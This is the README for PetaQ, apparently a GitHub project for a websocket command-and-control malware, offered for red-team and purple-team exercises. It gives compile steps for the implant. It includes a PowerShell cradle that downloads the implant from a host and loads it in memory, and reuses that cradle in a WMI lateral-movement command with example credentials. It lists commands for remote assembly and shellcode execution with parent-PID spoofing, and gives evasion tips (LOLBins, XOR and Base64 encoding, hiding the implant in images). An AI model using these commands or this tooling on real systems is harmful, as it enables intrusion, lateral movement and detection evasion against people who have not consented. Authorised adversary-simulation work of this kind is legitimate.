/Purple-team

Primary LanguageC#MIT LicenseMIT

PetaQ

PetaQ is a malware which is being developed in .NET Core/Framework to use websockets as Command & Control (C2) channels. It's designed to provide a Proof of Concept (PoC) websocket malware to the adversary simulation exercises (Red & Purple Team exercises).

I have used Petaq actively in my purple team exercises for my previous and current employers. Don't consider it as a full replacement of your C2, but would enrich your toolkit, interactive environment or evasive actions. It's not suitable for any production level use, but can be used for test purposes.

  • Petaq Service - The Command & Control Service (.NET Core)
  • Petaq Implant - The Malware (.NET Framework)

Meaning

P'takh (petaQ) is a Klingon insult, meaning something like "weirdo," deriving from the verb "to be weird" (taQ), with and [sic] you (plural) imperative prefix (pe-). Alternative romanizations include pahtak, p'tak, patahk, and pahtk. http://www.klingonwiki.net/En/Cursing

Disclaimer

  • This tool is developed to assist Purple Team exercises, not adversaries. If they use it, blame on them, not me.
  • There are several bad programmig or technical decisions in this code which may make you highly uncomfortable. If so, please consider to not use it, submit a pull request or register a bug. If I can find some time for it and improve my programming skills, I'll make this code better in time.

Versions and Change Log

  • 0.1 - 18 May 2020
Initial release
  • 0.2 - 18 August 2020
Scenario and TTP support added
File operations (upload/download) added
Several bugs fixed including transmission buffers
Powershell through .NET System Automation added
Commands are now supporting "file" to send the binaries/scripts through the C2 channels

Features

Scenario Support

  • Prepare scenarios and send them to implant to run
  • TTP support for the scenarios to construct

Communications

  • WebSocket through HTTP(S) (Implant to C2)
  • SMB Named Pipe (Implant to Implant)
  • TCP (Implant to Implant)
  • UDP (Implant to Implant)

File Operations

  • Upload
  • Download

Execution

  • Execute a process (cmd.exe, powershell.exe or you choice)
  • Execute a PowerShell file/script using .NET System Automation
  • Execute .NET assemblies from remote (no touching disk)
  • Execute .NET source code from remote (no touching disk)
  • Execute .NET source code like a .NET C# shell (no touching disk)
  • Execute X86/X64 shellcode using QueueUserAPC with Parent PID spoofing
  • All executions can also be a thread to avoid Petaq Implant to wait it finishing (e.g. execthread)

Multi-Level Linking Implants to Implants

  • Implants can be linked to other implants pretty much like Cobalt Strike. This is supported on TCP, UDP and SMB Named Pipe.
  • Up to 8 level of linking worked well, and quite useful for lateral movement. However, I prefer to use TCP or UDP instead of SMB Named Pipe as its IO is not quite ready for multi-level implant communications.

Lateral Movement

  • WMI W32 Create is preferred/integrated
  • In case of variety required; it's possible to use schtasks, sc, admin$ and powershell can be used through execthread command

Documentation

Configuration

You can tweak the following files to configure the C2 and malware.

  • PetaqService configuration file is Properties/launchSettings.json
  • PetaqImplant configuration file is Configuration.cs

Installation

The service is for .NET Core, so it can run on any .NET Core 2.2.* instances on Windows, Linux or Mac. To run the service, you can simply give "dotnet run" command. You may need to install a bunch of nuget packages to satisfy the requirements before compiling it.

The malware needs to be compiled using .NET Framework as it has inline .NET compiler and Win P/Invoke used. To compile the malware, you can run "csc /r:System.Management.Automation.dll /out:malware.exe *.cs" in the petaqimplant folder. In case of you compile the implant on Linux or Mac, you can use Mono for compiling it using the same commands as well.

Deployment to the Victims

Even though it's too noisy, running the following Powershell line would load the compiled Petaq Implant as reflected assembly for testing. You can compile the Petaq Implant as above, then place it into the wwwroot folder of Petaq Service as index.html. So the url would point to the binary to load directly.

powershell –c $m=new-object net.webclient;$Url='http://PETAQIMPLANTHOSTEDSITE/';$dba=$m.downloaddata($Url);$a=[System.Reflection.Assembly]::Load($dba); $a.EntryPoint.Invoke(0,@(,[string[]]@()))

I suggest you to some operational security measures for any production or evasive testing.

  • Consider InstallUtil, Regsvr32, RegAsm, DotNettoJs, RunDLL32, WMI or MSBuild for evasive initial execution.
  • Consider using XOR for the implant to convert, Base64 encoding or hiding it in an image file to avoid network detections.
  • Consider replacing some Petaq words in the source code. Even though currently

In Action

2020-5-18---16-41-36
Hosting environment: Development
Content root path: /tmp/petaqC2/petaqservice
Now listening on: https://0.0.0.0:443
Now listening on: http://0.0.0.0:80
Application started. Press Ctrl+C to shut down.
Petaq - Purple Team Simulation Kit
\# Creating Logs/2020-5-18---16-41-36 folder.
Log file Logs/2020-5-18---16-41-36/29B0OAZEX3CEAW2V2UAQ.txt created.
\# Registering the implant...
Implant registration for 29B0OAZEX3CEAW2V2UAQ is done.
Links are adding to the implant...
\# list
Session ID		User Name		Hostname	IP Address	Status		Link URI
29B0OAZEX3CEAW2V2UAQ	SHEEP\dev		Sheep		172.16.121.142	connected	ws://172.16.121.1:80/ws
\# use 29B0OAZEX3CEAW2V2UAQ
Use 'back' instruction for the main menu.
29B0OAZEX3CEAW2V2UAQ # exec whoami
29B0OAZEX3CEAW2V2UAQ # Waiting for the process to complete...
29B0OAZEX3CEAW2V2UAQ # sheep\dev

29B0OAZEX3CEAW2V2UAQ # exit
\# \# Session 29B0OAZEX3CEAW2V2UAQ is disconnected.
\#
\# list
Session ID		User Name		Hostname	IP Address	Status		Link URI
29B0OAZEX3CEAW2V2UAQ	SHEEP\dev		Sheep		172.16.121.142	disconnected	ws://172.16.121.1:80/ws
\# exit
Also use CTRL+C for stopping the implant services.
CApplication is shutting down...

Usage Examples

Petaq Implant Run Arguments:

  1. It runs Petaq Implants to connect to a Petaq Service using Websocket (If not configured on Configuration.cs)
    petaqimplant.exe ws://172.16.121.1/ws
    petaqimplant.exe wss://172.16.121.1:443/ws (SSL)
  1. It runs Petaq Implant on TCP 8000 and wait for another implant to link it to the Petaq Service
   petaqimplant.exe tcp 8000
  1. It runs Petaq Implant on UDP 8000 and wait for another implant to link it to the Petaq Service
    petaqimplant.exe udp 8000
  1. It runs Petaq Implant on SMB Named Pipe pipename1 and wait for another implant to link it to the Petaq Service
   petaqimplant.exe smb pipename1

Petaq Service Commands:

    Help:
        help
    List the Implants:
        list
    Use the Implant:
        use SessionID
    Remove the Implant:
        remove SessionID
    Show Routes for Linked Implants:
        route
    Run Scenarios:
        scenario IMPLANTID scenariofilepath
        scenarios
        scenarios SCENARIOID
        scenarios SCENARIOID output
        scenarios SCENARIOID export reportfilepath
    Exit:
        exit
        terminate

Practical Examples on Petaq Implant in Interaction (use ImplantID):

Usage Examples:
	exec cmd /c dir
        exec net use
        exec powershell -c Write-Output($env:UserName)
        exec-sharpassembly url http://127.0.0.1/Seatbelt.exe BasicOSInfo
        exec-sharpassembly url http://127.0.0.1/test.exe
        exec-sharpcode base64 http://127.0.0.1/test.b64
        exec-sharpcode url http://127.0.0.1/test.cs
        exec-sharpcode base64 http://127.0.0.1/test.cs.b64
        exec-sharpdirect Console.WriteLine(""test 1234"");
        link tcp://127.0.0.1/8002
        link udp://127.0.0.1/8002
        link smb://127.0.0.1
        link smb://127.0.0.1/petaq_comm

Link operations:
	route
        sessions
        link URI
        unlink ID

Lateral movement:
	lateralmovement wmiexec domain=galaxy username=administrator password=Password3 host=10.0.0.1 command="powershell –c $m = new- object net.webclient;$Url = 'http://172.16.121.1';$dba =$m.downloaddata($Url);$a =[System.Reflection.Assembly]::Load($dba); $a.EntryPoint.Invoke(0,@(,[string[]]@()))"

Execute a command/binary:
	exec cmd.exe /c dir
        exec powershell -c Write-Output($env:UserName)

Execute a command/binary/assembly as a thread (no wait, no output):
	execthread cmd.exe /c dir
        execthread powershell -c Write-Output($env:UserName)
        execthread-sharpassembly url http://127.0.0.1/Assembly.exe Parameters
        execthread-sharpassembly base64 http://127.0.0.1/Assembly.b64 Parameters
        execthread-sharpcode url http://127.0.0.1/Sharpcode.src Parameters
        execthread-sharpcode base64 BASE64_ENCODED_SHARPCODE Parameters

Inline run for .NET source code:
	exec-sharpdirect SHARPCODE
        exec-sharpdirect base64 BASE64_ENCODED_SHARPCODE

Execute a .NET assembly:
	exec-sharpassembly url http://127.0.0.1/Assembly.exe Parameters
        exec-sharpassembly base64 http://127.0.0.1/Assembly.b64 Parameters

Compile & Execute .NET source code:
	exec-sharpcode url http://127.0.0.1/Sharpcode.src Parameters
        exec-sharpcode base64 BASE64_ENCODED_SHARPCODE Parameters

Execute Shellcode:
	exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH64 T1
        exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH32 T2
        exec-shellcode base64 http://127.0.0.1/Shellcode.b64 ARCH64 T1
        exec-shellcode base64 http://127.0.0.1/Shellcode.b64 ARCH32 T2

Exit:
        exit
        terminate